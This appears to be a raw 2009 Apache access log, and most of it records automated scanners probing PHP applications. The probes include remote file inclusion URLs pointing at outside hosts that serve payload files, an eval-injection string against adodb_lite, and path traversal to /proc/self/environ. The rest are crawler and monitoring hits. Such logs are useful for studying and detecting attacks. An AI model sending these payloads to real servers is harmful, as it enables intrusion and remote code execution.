195.34.78.110 - - [23/May/2009:06:53:50 -0400] "GET //components/com_flyspray/startdown.php?file=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:53:50 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:53:50 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:53:51 -0400] "GET /logs/access_log.Q109050900%20%20/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:53:54 -0400] "GET /logs/access_log.Q109051200//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:54:51 -0400] "GET /logs/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:54:51 -0400] "GET /logs/access_log.Q109051200%20%20/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:54:51 -0400] "GET /announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:54:57 -0400] "GET /logs/error_log.Q109051200%20%20/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:06:55:44 -0400] "GET /logs/access_log.Q108090100//components/com_flyspray/startdown.php?file=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:06:56:41 -0400] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:06:56:41 -0400] "GET /logs/access_log.Q109050700//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:06:56:41 -0400] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:06:56:47 -0400] "GET /logs/access_log.Q108091300//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:06:56:50 -0400] "GET /logs/access_log.Q107120800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.104.47.218 - - [23/May/2009:06:57:09 -0400] "GET /logs/access_log.Q109051200/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:06:57:14 -0400] "GET /logs/access_log.Q109051200/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:06:58:40 -0400] "GET /logs/access_log.Q109051200/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:06:58:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.116.102.163 - - [23/May/2009:06:58:48 -0400] "GET /logs/error_log.Q109030200//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
216.104.47.218 - - [23/May/2009:06:58:50 -0400] "GET /logs/access_log.Q109050900/announcements.php?phpraid_dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:06:59:06 -0400] "GET /logs/access_log.Q109050700%20%20//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:59:43 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:06:59:48 -0400] "GET /logs/access_log.Q109050300//snippet.reflect.php?reflect_base=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:06:59:50 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.234.100.126 - - [23/May/2009:07:00:32 -0400] "GET /logs/access_log.Q109050700//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.234.100.126 - - [23/May/2009:07:00:32 -0400] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.234.100.126 - - [23/May/2009:07:00:32 -0400] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.234.100.126 - - [23/May/2009:07:00:37 -0400] "GET /logs/access_log.Q108091300//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:07:00:49 -0400] "GET /logs/access_log.Q109050700//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:07:00:58 -0400] "GET /logs/access_log.Q108053100//agendax/addevent.inc.php?agendax_path=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:07:01:25 -0400] "GET /logs/access_log.Q109051200//bbs/include/print_category.php?setup[use_category]=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:07:02:05 -0400] "GET /logs/access_log.Q108110100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.181.7.97 - - [23/May/2009:07:02:33 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.38 - - [23/May/2009:07:03:02 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
82.194.87.219 - - [23/May/2009:07:03:37 -0400] "GET /logs///errors.php?error=http://www.schnee-teufel.de/shop/images/id? HTTP/1.1" 404 215 "-" "libwww-perl/5.822"
209.59.12.99 - - [23/May/2009:07:03:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.184.79.138 - - [23/May/2009:07:04:26 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
91.184.79.138 - - [23/May/2009:07:04:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
87.101.211.130 - - [23/May/2009:07:05:10 -0400] "GET /logs/errors.php?error=http://www.elite-kosmetikschule.com/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.817"
87.101.211.130 - - [23/May/2009:07:05:10 -0400] "GET /errors.php?error=http://www.elite-kosmetikschule.com/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.817"
58.227.193.198 - - [23/May/2009:07:06:31 -0400] "GET /logs/error_log.Q108120100%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:07:07:22 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:07:07:22 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:07:07:22 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:07:07:29 -0400] "GET /logs/error_log.Q108090200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:07:08:11 -0400] "GET /logs/error_log.Q107082500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.94.148.39 - - [23/May/2009:07:08:16 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:07:08:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.189.224.21 - - [23/May/2009:07:11:04 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://208.98.22.241/id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.811"
213.189.224.21 - - [23/May/2009:07:11:04 -0400] "GET /logs/access_log.Q109010400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://208.98.22.241/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
213.189.224.21 - - [23/May/2009:07:11:04 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://208.98.22.241/id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
213.189.224.21 - - [23/May/2009:07:11:04 -0400] "GET /logs/access_log.Q108112700//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://208.98.22.241/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
219.94.148.39 - - [23/May/2009:07:12:31 -0400] "GET /logs/access_log.Q108091400%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:07:13:09 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:07:13:14 -0400] "GET /logs/access_log.Q108082200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:07:13:14 -0400] "GET /logs/access_log.Q109051200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
77.221.130.12 - - [23/May/2009:07:13:19 -0400] "GET /logs/access_log.Q109051200/announcements.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
77.221.130.12 - - [23/May/2009:07:13:19 -0400] "GET /announcements.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
77.221.130.12 - - [23/May/2009:07:13:19 -0400] "GET /logs/announcements.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
77.221.130.12 - - [23/May/2009:07:13:40 -0400] "GET /logs/access_log.Q109050900/announcements.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/May/2009:07:13:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.171 - - [23/May/2009:07:15:12 -0400] "GET /logs/access_log.Q109022800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.34.181.87 - - [23/May/2009:07:15:14 -0400] "GET /logs/access_log.Q109022800//main.php?pagina=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:07:15:14 -0400] "GET //main.php?pagina=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:07:15:14 -0400] "GET /logs//main.php?pagina=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
66.249.72.114 - - [23/May/2009:07:15:26 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [23/May/2009:07:15:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081BF40173177006F9D041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.194.87.219 - - [23/May/2009:07:15:29 -0400] "GET /logs//modules/errors.php?error=http://www.schnee-teufel.de/shop/images/id? HTTP/1.1" 404 222 "-" "libwww-perl/5.822"
91.149.157.130 - - [23/May/2009:07:16:24 -0400] "GET /logs/access_log.Q109022800//main.php?pagina=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:07:16:25 -0400] "GET //main.php?pagina=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
91.149.157.130 - - [23/May/2009:07:16:25 -0400] "GET /logs//main.php?pagina=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
123.125.64.51 - - [23/May/2009:07:16:44 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.49 - - [23/May/2009:07:17:00 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
77.221.130.12 - - [23/May/2009:07:17:08 -0400] "GET /logs/access_log.Q109051200%20/announcements.php?phpraid_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
64.34.181.87 - - [23/May/2009:07:17:43 -0400] "GET /logs/access_log.Q108123000//main.php?pagina=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
222.240.200.73 - - [23/May/2009:07:18:05 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
222.240.200.73 - - [23/May/2009:07:18:06 -0400] "GET /modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
222.240.200.73 - - [23/May/2009:07:18:09 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
203.251.81.155 - - [23/May/2009:07:18:30 -0400] "GET /?DOCUMENT_ROOT=http://www.fair-play-events.com//administrator/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.251.81.155 - - [23/May/2009:07:18:30 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.fair-play-events.com//administrator/id1.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
203.251.81.155 - - [23/May/2009:07:18:30 -0400] "GET /logs/access_log.Q109012300/?DOCUMENT_ROOT=http://www.fair-play-events.com//administrator/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.52.107.130 - - [23/May/2009:07:18:39 -0400] "GET //plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.814"
203.251.81.155 - - [23/May/2009:07:18:45 -0400] "GET /logs/access_log.Q109012300/?DOCUMENT_ROOT=http://www.fair-play-events.com//administrator/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
203.251.81.155 - - [23/May/2009:07:18:45 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.fair-play-events.com//administrator/id1.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:07:18:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [23/May/2009:07:19:22 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:07:19:22 -0400] "GET /logs/access_log.Q109050700/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:07:19:22 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:07:19:22 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:07:19:22 -0400] "GET /logs/access_log.Q109050700/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:07:19:23 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:07:19:27 -0400] "GET /logs/access_log.Q108091300/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:07:19:27 -0400] "GET /logs/access_log.Q108091300/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:07:19:44 -0400] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:07:19:44 -0400] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:07:19:44 -0400] "GET /logs/access_log.Q109012300//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:07:19:49 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:07:19:49 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:07:19:49 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:07:19:49 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:07:19:49 -0400] "GET /logs/access_log.Q109050700/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:07:19:49 -0400] "GET /logs/access_log.Q109050700/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:19:57 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:19:57 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:19:57 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:19:58 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:19:58 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:19:58 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:07:19:59 -0400] "GET /logs/access_log.Q108091300/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:07:20:01 -0400] "GET /logs/access_log.Q108091300/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:20:01 -0400] "GET /logs/access_log.Q108082200//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:20:02 -0400] "GET /logs/access_log.Q108082200//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:20:02 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:20:02 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:20:03 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.149.157.130 - - [23/May/2009:07:20:05 -0400] "GET /logs/access_log.Q108123000//main.php?pagina=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
222.239.76.25 - - [23/May/2009:07:20:08 -0400] "GET /logs/access_log.Q108082200//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.194.87.219 - - [23/May/2009:07:20:26 -0400] "GET /logs///errors.php?error=http://www.schnee-teufel.de/shop/images/id? HTTP/1.1" 404 215 "-" "libwww-perl/5.822"
74.63.33.250 - - [23/May/2009:07:20:45 -0400] "GET /modules/admin/vw_usr_roles.php?baseDir=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.63.33.250 - - [23/May/2009:07:20:45 -0400] "GET /logs/modules/admin/vw_usr_roles.php?baseDir=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:20:55 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:07:20:55 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0" 222.239.76.25 - -